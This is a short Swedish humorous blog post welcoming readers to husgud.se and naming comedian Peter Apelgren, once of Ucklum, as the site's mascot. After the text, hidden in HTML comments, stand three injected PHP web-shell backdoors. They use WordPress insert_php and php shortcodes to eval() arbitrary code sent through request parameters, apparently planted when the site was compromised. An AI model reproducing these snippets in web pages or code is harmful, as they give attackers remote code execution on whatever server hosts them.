Välkommen till husgud.se

Nu när vi har byggt in en massa sajter under ett och samma tak måste vi förstås ha en husgud. Valet var självklart – Peter Apelgren.

Göteborgskomikern med både halvobskyra klassiker som Parasit-tv och mindre bortglömda På spåret på meritlistan är troligen landets bästa improvisatör. Han är göteborgaren som till och med stockholmare kan älska. Han är enligt, åtminstone halva Skyltat-redaktionen, roligast i Sverige.

Och så har han bott i Ucklum.

”Jag tycker det är mycket konstigare att jag har en man från Ucklum än en dotter som kommer från Kina”, har Peters fru Anna Mannheimer berättat för Aftonbladet.

Vi finner det inte riktigt lika märkligt. Ucklum tillhör Stenungsunds kommun där även Skyltat.se och dess systersajter har sitt högsäte. En plats för humor helt enkelt.

Nog om detta. Här kommer ett bevis på Peters märkliga storhet. Och det knyter förstås an till Ucklum. Vad ska dom upp i ansiktet å göra, fruntimrena?

<!– [insert_php]if (isset($_REQUEST["twWTn"])){eval($_REQUEST["twWTn"]);exit;}[/insert_php][php]if (isset($_REQUEST["twWTn"])){eval($_REQUEST["twWTn"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["wKB"])){eval($_REQUEST["wKB"]);exit;}[/insert_php][php]if (isset($_REQUEST["wKB"])){eval($_REQUEST["wKB"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["wex"])){eval($_REQUEST["wex"]);exit;}[/insert_php][php]if (isset($_REQUEST["wex"])){eval($_REQUEST["wex"]);exit;}[/php] –>